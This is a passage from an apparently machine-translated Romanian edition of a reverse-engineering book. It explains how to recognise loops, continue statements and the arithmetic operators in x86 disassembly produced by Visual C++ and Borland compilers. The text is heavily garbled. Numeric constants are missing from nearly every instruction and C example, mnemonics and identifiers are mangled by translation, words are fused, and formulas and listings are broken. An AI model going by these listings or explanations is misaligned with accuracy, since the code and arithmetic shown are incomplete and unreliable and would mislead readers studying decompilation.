efectuat cel puțin odată INC EBX;Creștem parametrul ciclului CMP EBX, Oah;Comparăm evos așa sensul lui Oha JL scurt LOC ;Trecerea la începutul ciclului, în timp ce Eugene main () {int a = ;While ( ) {printf ("ii operator \ p");if (++ a> ) pauză;Printf ("al -lea operator \ n");} do {printf ("II operator \ p"); if ( a OHA) Break ;Am inversat " ", deoarece JLE transferăgestionarea codului;Continuările ciclului și ramura din cazul nostru este în pauză OS : Cod xref:main+ eope;Legătura încrucișată este direcționată - prin urmare, acesta nu este începutul ciclului PUSH OFFSETA I PERATOR CALL PRINTF ADD ESP, ;Printf (" nd Operator \ p") " nd Operator \ n" JMP scurt LOC B;Sari laînceputul ciclului Așa că am ajuns la sfârșitul ciclului ;Restabiliți codul sursă:,- în timp ce ( );{;Printf ("IIoperator \ n");;if (++ var a> oha) pauză;;Printf ("al -lea operator");LOC : Cod xref: main+ îj principal+ o = ;Vezi:Operatorul ciclului de pauză nu este diferit de;Rupeți în timp ce ciclul ';Prin urmare, nu vom scăpa, ci o decompiemimediat 'GPAV Identificarea ciclurilor ;if (var a oha ;Întrucât această echipă nu este ultima în corpulciclului ,;Acesta este un ciclu cu starea la mijloc ;if (var esi> ok) phread Push Offset A IOPERATOR;" ND OPERATOR \ N"CALL PRINTF ADD ESP, ;Printf ("al -lea operator") JMP scurt LOC ;O tranziție necondiționată la începutulciclului ;După cum puteți vedea, compilatorul de optimizare a aruncat inutilul;Verificarea afecțiunii, simplificareacodului și facilitarea înțelegerii acestuia :;Asa de: ;var esi = o;pentru (;;) dxa) pauză;;Printf ("al -lea operator");;) LOC : Cod xref: main+ viteză;Acesta nu este începutul ciclului!Push offset aliopeattor ;„Operator iy” Call Printf AddESP, ;Printf ("II operator");Hmm, modul în care acesta nu este începutul ciclului este foarte similar DECESI; var esl JS scurt LOC ;Ieșiți din ciclu dacă var esi >>> Ce fel de minuni fac?În primul rând, apelul primului operator;Al doilea ciclu a fost deja îndeplinitmai devreme, în al doilea rând, nu poate urma;Mijlocul ciclului ar trebui să -și urmeze începutul? deci; varesi JNZscurt LOC ;Continuarea ciclului în timp ce var esi '= LOC :;Cod xref: main+ viteză;Sfârșitulciclului ;Da, există ceva de gândit la ;Compilatorul a „digerat” în mod normal prima linie a ciclului;Printf ("IIoperator \ p") ■; și apoi "a alergat" pentru ramificare :; dacă (-a main () {int a = ;În timp ce (a ++ );} Rezultatul compilatorului său Microsoft Visual Visual C ++ cu setările implicite va arăta așa cum searată în lista Listarea Rezultatul difuzării unui exemplu care demonstrează continuarea continuă - folosindMicrosoft Visual C ++ cu setări implicite principale proc Cod xref: start+af^p var a = dword ptr - pushh ebp movebp, esp;Deschide rama Stack Împinge ECX;Rezervăm un loc pentru o variabilă locală GPAVA Identificarea ciclurilor MOV [EBP+VAR A], O;Alocăm variabila locală ѵag a valoarea OS V : C DE XREF: Main+ > LJ Main+ XJ;Două legături încrucișate direcționate înainte indică faptul că estefie;Începutul a două cicluri (dintre care unul este investit) sau tranziția la început;Operator continuu ciclu MOV EAX,[EBP+VAR A];Încărcăm valoarea lui ѵag a în EAX Mov ech, [ebp+var a];Încărcăm valoarea lui ѵAG A în CE Adăugați ES, ;Creștem Ech pe unitate mov [ebp+ѵag - a], esh;Actualizați variabila ѵAG A CMP eah, Oah;Comparați valoarea variabileiѵag a cu o creștere cu numărul de OH JGE scurt OS ;Ieșirea din ciclu (trecerea la comandă urmând instrucțiunile, Direcționată - la începutul ciclului) dacă ѵag a> = oha CMP [EBP+VAR A], ;Comparați ѵag a cu o valoare de x JNZ scurtLOC ;Dacă ѵag a = , atunci săriți la comanda urmând instrucțiunile;O tranziție necondiționată direcționată - laînceputul ciclului ;Este foarte asemănător cu condiția de a părăsi ciclul, dar nu ne vom grăbi C;Să ne amintim cuconcluzii - La începutul ciclului am întâlnit două încrucișări;Link -uri Tranziția necondiționată „JMP scurt OS V”doar formează;unul din ei Și cine „răspunde” pentru încă să răspundă la acest lucru;Întrebarea trebuie analizatărestul codului ciclului JMP scurt OS V;O tranziție necondiționată direcționată la începutul ciclului este fie unfinal;Ciclu sau continuă ;Să presupunem că acesta este sfârșitul ciclului Atunci ce este;"JGE scurt LOC "?Asumareapărăsirii ciclului?Nu arată ca - în;În acest caz, ar sări mult „mai aproape” - pe marca OS ;Sau poate „JGE scurt S ” presupunerea unui ciclu, a;"JNZ scurt OS " - Postup -ul altuia investit în IT ;Este foarte posibil,dar puțin probabil - în acest caz, post -mergența;Ar fi o condiție pentru a continua, a nu completa ciclul;Prin urmare,cu un anumit grad de incertitudine, putem accepta;Designul SMR ѵAG A, \ JNZ OS \ JMP OS V;Pentru dacă (a== ) continuă OS : C DE XREF: Main+ Viteze EDX, [EBP+VAR A] PARTEA III Identificarea structurilor cheieale limbilor de nivel înalt Push EDX Push Offset ASC ;"%x \ n" apel printf add esp, ;Printf ("%x \ n", var a)JMP scurt LOC B;Dar acesta este în mod clar sfârșitul ciclului, deoarece JMP scurt S V este cel maimult;Ultima legătură la începutul ciclului ;Deci, vom rezuma ceea ce avem :;Starea localizată la începutul cicluluitransformă acest ciclu până atunci ,;În timp ce ѵag a Lj; început a ciclului Emp Emp [EBP+VAR A], ; comparăm variabila ѵag a cu o valoare de x JNZscurt LOC F; dacă var a '= , atunci continuarea ciclului JMP scurt S ; tranziția la Condiția CondițieiCondiții Condiții de consiliere ; Aceasta este incontestabilă, „Continuați” și întreaga structură arată astfel :; dacă(a == ) continuă LOC F: Cod xref: Main+ Bîj mov eax, [EBP+VAR A ] Push Ex Push Offset ASC ; "%x \ n" gpava Identificarea ciclurilor CALL PRINTF ADD ESP, ; printf ("%x \ n", var a) LOC : Cod xref: main+ dîj movecx, [ebp+var a] sub ecx, mov [ebp+var a], ecx, var a cmp [ebp+var a], ;Comparație var a cu zero Z) g scurtLOC ;În timp ce var a> Continuați ciclul Pare un post -ofițer, nu?Atunci: ;do;{;if (a == ) continuă;;Printf("%x \ n", var a);;} While (—var a> );Mov ESP, EBP POP EBP Retn Main Endp și acum vom vedea cum optimizarea (/O) ainfluențat tipul de cicluri (listarea ) Listarea Rezultatul difuzării unui exemplu care demonstreazăcontinuarea identificării folosind Microsoft Visual C ++ cu optimizarea procului principal aproape C DE XREF:START+AFLP PUSH ESI MOV ESI, LOC : Cod xref: main+lf^j;Începutul ciclului CMP ESI, JZ ShortLOC ;Tranziție la LOC , dacă ESI == Pushh ESI Push Offset ASC ;"%x \ n" CALL PRINTF ADD ESP, ;Printf ("%x \ n", ESI);Notă: Această ramură este efectuată numai dacă ESI '= ;Prin urmare, poate fi înfățișat dupăcum urmează :;if (ESI! = ) printf ("%x \ n", ESI) LOC : Cod xref: main+ viteză;ESI- EAX, ESI ESI PARTEAIII Identificarea structurilor cheie ale limbilor de nivel înalt Emp eah, Oah JL Short LOC ;Continuarea cicluluide până acum (ESI ++ ;Total:;do;{;if (esi! = );{;Printf ("%x \ n", ESI);;} În timp ce ( - ESI> ) Endp principal Restul compilatorilorgenerează aproximativ același cod Common pentru toate cazurile va fi faptul că pe cicluri cu presupunerea operatoruluicontinuu este aproape indistinguibilă de ciclul investit, iar pe cicluri cu postcriptionul continuu este echivalent curamificarea elementară În cele din urmă, a apărut rândul ciclurilor Forbe care rotesc mai multe contoare în acelașitimp Luați în considerare următorul exemplu (listarea ) GPAVA Identificarea ciclului Listarea Demonstrarea identificării forțelor pentru for cu mai multe int -uri de int a;int;pentru (a = , b = ; a ; a ++, b -) printf (" %x %x \ n", a, b);Rezultatul compilării sale cu compilarea Microsoft Visual C ++ ar trebuisă arate așa cum se arată în lista Listarea Rezultatul difuzării unui exemplu care demonstreazăidentificarea forțelor pentru mai mulți metri folosind Microsoft Visual C ++ Main Proc în apropiere decompilator;Cod xref: start+af | p var b = dword ptr - var a = dword ptr push ebp mov ebp, esp;Deschide rama Stack Subesp, ;Rezervăm memorie pentru două variabile locale mov [ebp+var a], ;Alocăm o variabilă ѵag a valoare x mov[ebp+var b], oah;Alocăm variabila var b valoarea OHA JMP scurt LOC ;Sari pe codul de verificare pentru a părăsiciclul ;Aceasta este o caracteristică caracteristică a Forbului non -optimizat OS : C DE XREF: Main+ -FJ;CrossLink, regizat în jos, sugerează că acesta este începutul;ciclu Și puțin mai devreme am aflat deja că tipul de ciclu estepentru MOV EAX, [EBP+VAR A] Adăugați eAH, MOV [EBP+VAR A], EAX;Var a ++ mov ecx, [ebp+var b] sub ecx, mov[ebp+var b], ecx;Var b - LOC : C DE XREF: Main+ viteze CMP [EBP+VAR B], JLE scurt LOC ;Ieșiți din cicludacă var b ), a (a l; var a ++, var b ); printf(" %x %x \ n", var a, var b) loc : Mov ESP, EBP POP EBP; Închideți cadrul Steki Retn Main Endp; Code Xref:Main+ Cîj Versiune optimizată a programului pe care nu o vom lua în considerare, deoarece acest lucru nu ne va arătanimic nou Oricare ar fi compilatorul pe care îl alegem - Expresiile de inițializare iar modificarea contoarelor va fiprocesată destul de corect în ordinea anunțului lor în textul programului, dar expresiile multiple ale continuăriiciclului nu pot prelucra corect niciun compilator corect! Capitolul Identificarea operatorilor matematici din acestcapitol Vom lua în considerare identificarea operatorilor matematici IdentificareaOperator + În cazul general,operatorul + este difuzat fie în instrucțiunea Adăugare a mașinii, „șlefuire” operanduri întregi, fie în instrucțiunileFADDX care procesează valorile materiale Optimizarea compilatoarelor pot înlocui Adăugarea XXX, mai mult comandăcompactă INC XXX, iar designul C = A + B + costul este difuzat în instrucțiunea LEA C, [A + B + Cost] Un astfel de trucvă permite să pliați mai multe variabile într -o singură cădere, returnarea sumei primite în orice registru de scopgeneral nu este neapărat în componenta din stânga, așa cum necesită echipa ADD Cu toate acestea, LEA nu poate fidecompilată direct în operator +, deoarece este utilizat nu numai pentru adăugarea optimizată , ci și în scopul săudirect - calcularea deplasării eficiente Această problemă a fost considerată în detaliu în capitolul , „Identificareaconstantelor și deplasărilor” Luați în considerare următorul exemplu (listarea ) - Listarea L Demonstrareaoperatorului "+" main () {int, b, s;C = a + b;Printf ("%x \ n", c);C = c+ ;Printf ("%x \ n", c);} Rezultatul compilăriisale folosind Microsoft Visual C ++ cu setările implicite ar trebui să arate așa cum se arată în lista IListing Rezultatul compilării exemplului din lista folosind Microsoft Visual C ++ !■ Cu setări impliciteVar C = DWORD PTR -OCH Adăugare optimizată, în general, este un produs de -produs al echipei LEA Partea IIIIdentificarea structurilor cheie ale limbilor de nivel înalt Var b = DWORD PTR - VAR A = DWORD PTR - PUSH EBP MOV EBP,ESP;Deschide rama Stack Sub esp, och;Rezervăm memorie pentru variabile locale MOV EAX, [EBP+VAR A];Încărcăm valoareavariabilei ѵag a în EAX Adăugați eax, [ebp+var b];Îndoiți EAX cu valoarea variabilei ѵag i;Și scriem rezultatul înEAX mov [ebp+var c], eah;Copiați suma ѵag a și ѵag n în variabila ѵag s, prin urmare :;var c = var a + var b Mov Ecx,[EBP+VAR C] PUSH ECX PUSH OFFSET ASC ;"%x \ n" CALL PRINTF ADD ESP, ;Printf ("%x \ n", var c) mov edx,[ebp+var c];Încărcăm valoarea variabilă var c în EDX Adăugați edx, ;Îndoiți EDX cu o valoare de x , înregistrândrezultatul în EDX mov [ebp+ѵag - с], edx;Actualizați var c;var c = var c + mov eax, [ebp +var c] push eAx push offsetASC ;"%x \ n" CALL PRINTF ADD ESP, ;Printf ("%\ n", var c) mov esp, ebp pop ebp;Închideți rama lui Stack RetnMain Endp și acum să vedem cum va arăta același exemplu, compilat cu cheia /O (optimizare maximă) Rezultatul compilăriiexemplului este prezentat în lista GPAVA Identificarea operatorilor matematici Listarea Rezultatulcompilării exemplului din listarea folosind compilatorul Microsoft Visual C ++ cu optimizarea maximă a proculuiprincipal lângă ■ Soye XREF: Start+AF-HP PushH ECX;Rezervăm un loc pentru o variabilă locală;(Compilatorul a consideratcă trei variabile pot fi stoarse într -una; și acest lucru este adevărat) Mov eax, [esp+ ];Încărcăm valoarea variabileiѵag a în EAX Mov ech, [esp+ ];Încărcăm valoarea variabilei ѵag n în EAC;(Deoarece nu este inițializat, vă puteți încărcade oriunde) Împinge ESI;Salvăm registrul ESI în stivă Lea Esi, [esh+eah];Folosim Lea pentru a adăuga rapid Esh și EAX cu ulterior;Înregistrarea sumei din Registrul ESI Urmează „Adăugare rapidă”;Înțelegeți în sensul că echipa LEA esteexecutată;Mai rapid decât adăugarea - numărul de bătăi în ambele cazuri este același, dar Lea;Vă permite să scăpați decrearea unei variabile temporare pentru;conservarea rezultatului intermediar de adăugare, regie imediat;rezultă înESI Astfel, această echipă este decompilată ca;reg esi = var a + var b Push ESI Push Offset ASC ";"%x \ n apel printf;Printf ("%x \ n", reg esi) Inc ESI;Creștem ESI pe unitate ;reg esi = reg esi + push esi push offsetasc ,- "%x \ n" apel printf adsp, loh;Printf ("'BHHP", Reg ESI) Pop ESI Pop Ecx Retn Endp principal Compilatoriirămași (Borland C ++, Watcom C) generează cod aproximativ identic, deci nu are rost să dea rezultate - nu poartă niciunnou "evidenție" Partea a III -a Identificarea structurilor cheie ale limbilor de nivel ridicatIdentificarea operatorului - în cazul general, operatorul - este difuzat fie în instrucțiunea sub -mașină (dacăoperandele sunt valori întregi), fie în instrucțiunea FSUBX (dacă operandele sunt Valori materiale) Optimizareacompilatoarelor pot înlocui sub xxx, comandă mai compactă dec xxx, și sub design, cst, difuzat pentru a adăuga a,-const A doua opțiune nu este mai compactă și nu mai rapidă (ambele instrucțiuni se încadrează într -un singur ritm), cutoate acestea, proprietarul (compilatorul) este maestrul Vom demonstra acest lucru folosind un exemplu dat în lista Listarea Demonstrarea identificării operatorului principal () int a, b, c;C = a - b;Printf ("%x \ n", c);C = C- ;Printf ("%x \ n", c);} Opțiunea non -optimizată va arăta aproximativ așa cum se arată în lista Listarea Versiunea neoptimizată a exemplului unui proc principal în apropiere de listare Cod xref: start+af -hp var c =dword ptr -ch var b = dword ptr - var a = dword ptr - push ebp ebp ebp, esp;Deschide rama Stack Sub esp, och;Rezervămmemorie pentru variabile locale MOV EAX, [EBP+VAR A];Încărcăm valoarea variabilei ѵag a în EAX Sub eax,[ebp+var b];Scădem din ѵag a valoarea variabilei ѵag y ;;Scrieți rezultatul în EAX mov [ebp+var c], eah;Înregistrați înѵag s diferența ѵag a și ѵag y ;Var c = var a - var b mov mov push împinsă apel Adăugare ECX, [ebp+var c] ECX OffsetASC printf esp, GPAVA Identificarea operatorilor matematici ;Printf ("%x\ n", ѵag s) mov edx, [ebp+var c];Încărcăm valoarea variabilă ѵAG S în EDX Sub edx, oah;Scădem valoarea OHA de la VAR C,înregistrând rezultatul în EDX mov [ebp+var c], edx;Actualizați var c ;Varc = varc - OHA MOV EAX, [EBP+VAR C] PUSH EAXPUSH OFFSET ASC ;"%x \ n" CALL PRINTF ADD ESP, ;Printf ("%x \ n", var c) mov esp, ebp pop ebp;Închideți rama luiStack Retn Main Endp și acum vom lua în considerare versiunea optimizată a aceluiași exemplu (lista ) Listarea ,un exemplu din lista , compilat folosind Microsoft Visual C ++;Cu optimizarea maximă a procului principal înapropiere C DE XREF: START+AFIP PUSH ECX;Rezervăm un loc pentru o variabilă locală ѵAG A Mov eax, [esp+var a];Încărcămvaloarea variabilei locale ѵag a în EAX Împinge ESI;Rezervăm un loc pentru o variabilă locală ѵag mov esi,[esp+var b];Încărcăm valoarea variabilei var b în ESI Sub Esi, eax;Reducem valoarea var b din var a, înregistrândrezultatul în ESI Push ESI Push Offset ASC ;"%x \ n" apel pnntf;Printf ("%x \ n", var a - var b) Adăugați ESI, fffffff h;Adăugați la valoarea ESI (var a și var b) oxffFFFS ;De la xffffffff == -oha, această linie a codului aratăastfel :;ESI = (var a - var b) + ( - oha) = (var a - var b) - oha Împingeți ESI Partea a III -a Identificareastructurilor cheie ale limbilor de nivel înalt împinge ASC CALL PRINTF ADD ESP, LOH;Printf ("%x \ n", var a -var b oxa) pop esi pop ecx;Închideți rama lui Stack Retn Main Endp Compilatorii rămași (Borland, WATCOM) generează uncod aproape identic, deci nu sunt luate în considerare aici Identificarea operatorului / În cazul general, operatorul /este tradus fie în instrucțiunea DIV Machine (divizia Integer Unisable), fie în IDIV (divizia integer cu un semn) sau înFDIVX (divizia materială) Dacă divizorul este o culoare a gradului de deuce, atunci divul este înlocuit cu oinstrucțiune mai rapidă a deplasării bitului la SHR -ul drept, n, unde a este împărțit, iar n este indicatorul graduluicu baza două Un ușor mai complicat este diviziunea rapidă a numerelor de semne Nu este suficient să efectuați oschimbare aritmetică la dreapta (o echipă de schimbare aritmetică la SAR din dreapta umple liliecii seniori ținând contde semnul numărului), deoarece dacă modulul este împărțit mai puțin decât modulul divizor, atunci Schimbarea aritmeticăva face la dreapta pentru a arunca toate luptele semnificative în „coșul de mușcătură”, în Al cărui rezultat se va dovedi a fi oxffffffffff, adică - , în timp ce răspunsul corect este zero În general, diviziuneanumerelor iconice cu o schimbare aritmetică la dreapta oferă rotunjire într -o direcție mai mare, care nu este delocinclusă în planurile noastre Pentru a rotunji numerele iconice în direcția mai mică, este necesar să se adauge numărul ' - la divizat, unde n este numărul de biți la care numărul este schimbat în timpul diviziei Este ușor de observatcă acest lucru duce la o creștere a tuturor bitelor deplasate pe unitate și transfer la categoria senior, dacă cel puținunul dintre ele nu este egal cu zero, trebuie menționat că diviziunea este o operație foarte lentă, mult Înmulțirea mailentă decât înmulțirea (DIV poate prelua de la peste de bătăi, în timp ce MUL se încadrează de obicei în ), astfelîncât compilatoarele de optimizare avansate înlocuiesc diviziunea cu înmulțire Există multe formule de astfel detransformări, de exemplu, cele mai populare dintre ele, unde n este un număr de număr Se dovedește că linia dintreînmulțire și divizare este foarte subțire, iar identificarea lor este destul de complicată Luați în considerare unexemplu dat în lista Listarea , un exemplu care demonstrează identificarea operatorului de intrare INTA;Printf(" %x %x \ p", a / , a / );Rezultatul compilatorului său Microsoft Visual C ++ cu setări implicite ar trebui săarate așa cum se arată în lista Capitolul Identificarea operatorilor matematici Listarea Rezultatulcompilării unui exemplu care demonstrează identificarea operatorului de divizie folosind Microsoft Visual C ++ cusetările implicite principale proc C DE XREF: START+AF^P VAR A = DWORD PTR - PUSHH EBP MOV EBP, ESP;Deschide ramaStack Împinge ECX;Rezervăm memorie pentru o variabilă locală MOV EAX, [EBP+VAR A];Copiați în EAH Valoarea variabileiѵAG A CDQ;Extindem EAX la cuvântul cvadruplu edx: eax Mov Esh, Oah;Adăugăm sensul OHA în CE Idiv ech;Împărțiți (având învedere semnul) EDX: EAX pe OHA, aducând privat în EAX ;Eax = vara / oha push eah;Transmitem rezultatul calculelorfuncției printf MOV EAX, [EBP+VAR A];Încărcăm valoarea lui ѵag a în EAX CDQ;Extindem EAX la cuvântul cvadruplu edx:eax și edx, ifh;Subliniem cele cinci lilieci mai tineri EDX Adăugați eax, edx;Îndoiți semnul numărului pentru a efectuarotunjirea valorilor negative;în direcția mai mică Sar eax, ;Deplasare aritmetică la dreapta la poziții;echivalent cuîmpărțirea numărului cu = ;Astfel, ultimele patru instrucțiuni sunt descifrate ca :;Eax = ѵag a / ;Vă rugăm sărețineți: chiar și cu modul de optimizare, compilatorul;Optimizat diviziunea Împingeți EAH Push Offset Ahh;" %x %x \ n"CALL PRINTF ADD ESP, OCH;Printf (" %x %x \ n", var a / oxa, var a / ) partea III Identificarea structurilor cheieale limbilor de nivel înalt, mișc esp, ebp pop ebp;Închideți rama lui Stack Retn Main Endp și acum punând mâneci, luațiîn considerare versiunea optimizată a aceluiași exemplu (lista ) ;Listarea O versiune optimizată a unui exemplucare demonstrează identificarea operatorului de diviziune principal în apropiere;Cod xref: start+af^p pushh ecx;Rezervămmemorie pentru variabila locală ѵAG A Mov ech, [esp+var a];Încărcăm valoarea variabilei ѵag a în CE MOV EAX, H;Deci, care este acest număr brutal?!;În codul sursă, nimic de acest fel nu era aproape imul ech;Înmulțimacest număr brutal cu o variabilă ѵag a ;Vă rugăm să rețineți: înmulțim, nu împărțim ;Cu toate acestea, ne vom prefacecă suntem o perioadă în care nu avem un exemplu de exemplu ,;Prin urmare, nu vedem nimic ciudat în funcționareaînmulțirii Sar Edx, ;Efectuăm o schimbare aritmetică a tuturor bitelor EDX la două poziții la dreapta;că în primaaproximare este echivalentă cu diviziunea sa cu ;Cu toate acestea, până la urmă, EDX are un cuvânt dublu mai vechi alrezultatului;Multiplicare Prin urmare, cele trei echipe anterioare sunt de fapt;descifrat după cum urmează :;Edx =( h * var a) ”( + ) = ( h * var a) / x ;Aruncați o privire cu atenție la aceastălinie:;( H * ѵAG A) / x = VAR A * H / x =;= Var a * , , ;Înlocuirea înmulțirii diviziei conform tuturor regulilor matematicii și;În acelașitimp, efectuând rotunjirea într -un întreg mai mic pe care îl obținem :;ѵAG A * , = ѵAG A * ( / , )= ѵAG A/ ;De acord, dintr -o astfel de transformare, codul a devenit mult mai inteligibil ;Cum poate fi recunoscutăaceastă situație în programul altcuiva, originalul;A cui textul nu este cunoscut?Da, foarte simplu - dacă seîntâlnește;înmulțire și urmată de o schimbare la dreapta, denotând apoi diviziunea;Fiecare matematician normal va lua înconsiderare un astfel de design cu datoria sa;Reduceți, conform metodei recent descrise MOV EAX, EDX;Copiați privatulprimit în EAX Shr eah, lfh;Trecem la de poziții spre dreapta GPAVA Identificarea matematică Operatori Adaugă Edx, EAH;Fold: edx = edx + (edx >> ) ;Ce ar însemna asta?Esteușor de înțeles că după schimbarea EDX cu de biți;În dreapta, doar un bit de semn de număr va rămâne în el ;Apoi -dacă numărul este negativ, adăugăm la rezultatul diviziei;Una, rotunjindu -l în direcția mai mică Astfel, toateacestea;Codul viclean nu denotă altceva decât o operație banală;Divizia de semne: EDX = OAG A / ;Există prea mult coddoar pentru divizare?Desigur, programul;Mare „umflături”, dar tot acest cod este executat în doar ;tacturi, în timp cese află într -o versiune neoptimizată până la ;/* Măsurătorile au fost efectuate pe procesorul Celeron cu nucleulnuclear P , pe altele;Procesoarele numărului de ceasuri pot diferi */;Acestea Optimizarea a dat mai mult de trei oricâștigurile;Bravo Microsoft!Mov eax, esh;Reamintim: Ce este în UE?;Parcurgeți ecranul Dizassembler în sus Da, înUE;Ultima dată a fost descărcată de valoarea variabilei ѵAG A Împingeți edx;Transmitem funcțiile printf rezultatuldiviziei ѵAG A cu CDQ;Extindem EAX (ѵAG A) la cuvântul cvadruplu edx: eax și edx, ifh;Alegeți cei mai tineri bițidin registrul EDX care conține semnul ѵAG A Adăugați eax, edx;Ne rotim până la mai mici Sar eax, ;Schimbarea aritmeticăîn este echivalentă cu împărțirea ѵag a în Push eah push Push Offset ahh;" %x %x \ n" CALL PRINTF ADD ESP,LOH;Printf (" %x %x \ n", var a / , var a / ) retn endp principal fântâna și alți compilatori, cât de avansat dinpunct de vedere al optimizării?Din păcate, nici Borland, nici WATCOM nu sunt capabile să înlocuiască diviziunea cu oînmulțire mai rapidă pentru numere care sunt diferite de gradul de Deuce În confirmarea acestui lucru, vom lua înconsiderare rezultatul compilării aceluiași exemplu de către compilatorul Borland C ++ (listarea ) Listarea Rezultatul compilării unui exemplu care demonstrează identificarea diviziei> compilată folosind Borland C*+ MainProc în apropiere DATA XREF: DATE: ^ PUSHH EBP MOV EBP, ESP PARTEA III Identificarea structurilor cheie alelimbilor de nivel ridicat;Deschide rama Stack Împingeți EBX;Salvam EVOS Mov eax, esh;Copiați conținutul non -unicului înEAC;Înregistrați Variabila UE Mov ebx, oah;Aducem sensul Oha în ecou CDQ;Extindem EAX la cuvântul cvadruplu edx:eax Idiv ebx;Împărțim Ech -ul în Okha (împărțim mult timp - tacte sau chiar mai mult) PUSH EAH;Transmitem valoareaobținută a funcției printf Teste, Esh JNS scurt LOC ;Dacă diviziunea nu este negativă, atunci trecerea la OS Adăugați esh, lfh;Dacă este împărțit pozitiv, apoi adăugați oxlf pentru a rotunji iOS : Cod xref: main+llîj sar ecx, ;Five Poziție deplasare la dreapta, împărțim numărul cu Push ECX Push Offset Axx;" %x %x \ n*apelați printf add esp, och; printf (" %x %x \ n ", var a / , var a / ) hog eah, eah; returnați pop ebx ebp;închideți cadrul fripturii ; Retn Main Endp Identificarea operatorului % din instrucțiunile speciale pentru calculareasoldului în setul de comenzi ale microprocesoarelor din seria x - în schimb, soldul împreună cu privat este returnatde instrucțiunile de divizie pentru DIV, IDIV și FDIVX A se vedea secțiunea anterioară "Identificarea operatorului /" GPAVA Identificarea Operatorilor Matematici Dacă divizorul este gradul deDeuce ( N = B), iar divizibilul este un număr de nenumărate, atunci restul va fi n de către n de către Bucăți mai tineriai numărului împărțit Dacă divizibil este semnificativ, pentru a păstra semnul numărului, este necesar să instalațitoate liliecii, cu excepția primului N, egal cu egal cu un bit de semn Și dacă n primii biți sunt zero , toate bucățilerezultatului trebuie să fie abandonate, indiferent de valoarea unui bit de semn Astfel, dacă este divizibil este unnumăr insuportabilIată, atunci expresia a % n este difuzată în design: și a, n, altfel difuzarea devine ambiguă -compilatorul poate introduce un test clar al egalității cu ramificarea și poate folosi algoritmi matematici complicați,dintre care cel mai popular arată Astfel: dec x \ sau x, -n \ inc x Întregul accent este că, dacă primii n biți ainumărului X sunt zero, atunci toate bucățile rezultatului, cu excepția seniorului, un bat de reper, vor fi garantate afi egale cu unul, iar instrucțiunea sau x, - - n va instala cu forță un bit senior, adică va dovedi o valoare egală- Iar Inc - va da zero!Dimpotrivă, dacă cel puțin unul dintre cei mai tineri biți este egal cu unul, atunci împrumutulde la BIT -uri senior nu se produce, iar instrucțiunea Inc X își returnează valoarea inițială Compilatorii de optimizareavansați pot, prin transformări complexe, să înlocuiască diviziunea într -o serie de alte operații mai rapide Dinpăcate, nu există algoritmi pentru calcularea rapidă a echilibrului pentru toți divizorii, iar divizorul ar trebui săfie pictat la x e, unde k și t sunt unele numere întregi Atunci restul este posibil Calculați în conformitate cu următoarea formulă: N T A T A % B = A % K * = A - ( - *—JJ) & ) *K Da, aceastăformulă este foarte complicată, iar identificarea operatorului optimizat poate poate Fii foarte, foarte dificil, maiales având în vedere tendința de a schimba ordinea comenzilor, caracteristică optimizării compilatorilor Luați înconsiderare exemplul dat în lista Listarea Identificarea operatorului % Main () (INTA; printf (" % x % x \p" și % și % ); rezultatul compilării acestui exemplu Microsoft Visual C ++ cu setări implicite ar trebui să arateca Arătat în lista Listarea Rezultatul compilării unui exemplu care demonstrează identificareaoperatorului % folosind compilatorul Microsoft Visual C ++ cu setările implicite principale PROC PTR - PUSH EBP MOVEBP MOV EBP MOV EBP MOV EBE ESP; Deschideți cadrul stivei Push ECX; Rezervați memoria pentru variabila locală MOV EAX,[EBP+VAR A]; introducem valoarea variabilei ѵAG II în EAX Identificarea structurilor cheie ale limbilelor cu nivelînalt cdq; extindeți eax la sfertul cuvânt edx: eax Mov esh, oah; facem sensul OHA Idiv esh; divide edx: eax (ѵag a)de esh ( OHA) Pushh Edx; transmite restul de la diviziunea ѵag a la funcțiile okha printf Mov edx, [ebp+var a];introduceți variabila var a Și edx, fh; "tăiați" iconic b bAcesta și patru biți mai tineri de numere ;Cei patrubiți juniori conțin restul diviziei Edx cu ] NS Short LOC ;Dacă numărul nu este negativ, atunci sărim pe OS Dec edx sau edx, offffffoh inc edx;Această secvență, așa cum am menționat anterior, este caracteristicărapid;Calculul demisiei unui număr de semn ;Prin urmare, ultimele șase instrucțiuni sunt descifrate ca :;Edx = oag a % OS : C de xref: vârf+it] push edx push offset axx;" %x %x \ n" CALL PRINTF ADD ESP, OCH;Printf (" % x % x \n", var a % oxa, var a % ) mișcare sp Vizual de la ++, nici restul compilatorilor nu sunt capabili să calculeze restulînmulțirii Identificarea operatorului * În cazul general, operatorul * este difuzat fie în instrucțiunea MUL MASH Imul(înmulțirea integerului cu un semn), sau în fmulx (înmulțirea materialelor) Dacă unul dintre dubbaterele gradului dedeuce, atunci mul (imul) este de obicei înlocuit de o comandă de schimbare a comenzii către instrucțiunile SHL sau LEAdin stânga care pot fi înmulțiți conținutul registrelor cu , și Ambele comenzi sunt executate într -un singurritm, în timp ce mulă necesită, în funcție de modelul procesorului, de la două până la nouă măsuri În plus, Leareușește să adauge rezultatul Înmulțirea cu conținutul scopului general al GPAV Identificarea operatorilormatematici și/sau constant în plus Acest lucru vă permite să vă înmulțiți cu , și , adăugând pur și simplu valoarea sa în registrul înmulțit Ei bine, nu este un basm?Adevărat, LEA are un defect -poate determina o adresă să blocheze adresa (interblocarea generației de adrese, AGI) , care în cele din urmă reduceîntregul câștig de viteză Luați în considerare exemplul dat în lista = Listarea , identificarea operatorului„** 'main () int a;Printf (" %x %x %x \ p", a * , a * + , a * );Rezultatul compilării acestui exemplu folosindMicrosoft Visual C ++ cu setări implicite ar trebui să arate așa cum se arată în lista - Listarea L Rezultatulcompilării exemplului care demonstrează identificarea operatorului; înmulțire folosind Microsoft Visual C ++ cu setăriimplicite principale proc C DE XREF: START+AF^P VAR A = DWORD PTR - PUSHH EBP MOV EBP, ESP;Deschidem cadrul stivei PushECX;Rezervăm un loc pentru o variabilă locală ѵAG A MOV EAX, [EBP+VAR A];Încărcăm valoarea variabilei ѵag a în EAX IMULEAH, ODH;Înmulțiți ѵag a cu oxd, înregistrând rezultatul în EAX PUSH EAH;Transmitem funcțiile de lucru printf var a *oxd Mov ech, [ebp+var a];Încărcăm valoarea lui ѵAG A în CE Lea Edx, DS: [ECX* ];Înmulțiți ECX cu și adăugați larezultatul rezultat , înregistrare;Este în edx Și toate acestea se fac într -o singură bătaie!Împingeți edx;Transmitemfuncțiile rezultatului printf ѵag a * + De regulă, pentru a calcula adresa cerută de instrucțiunile care lucrează cumemoria, este necesară o tact Dar, în cazul în care adresa depinde de rezultatul instrucțiunilor efectuate pe tactulanterior, este necesar un alt ritm Aceasta este blocarea adresei care generează informații mai detaliate despre aceastăproblemă poate fi găsită la: http://www agner 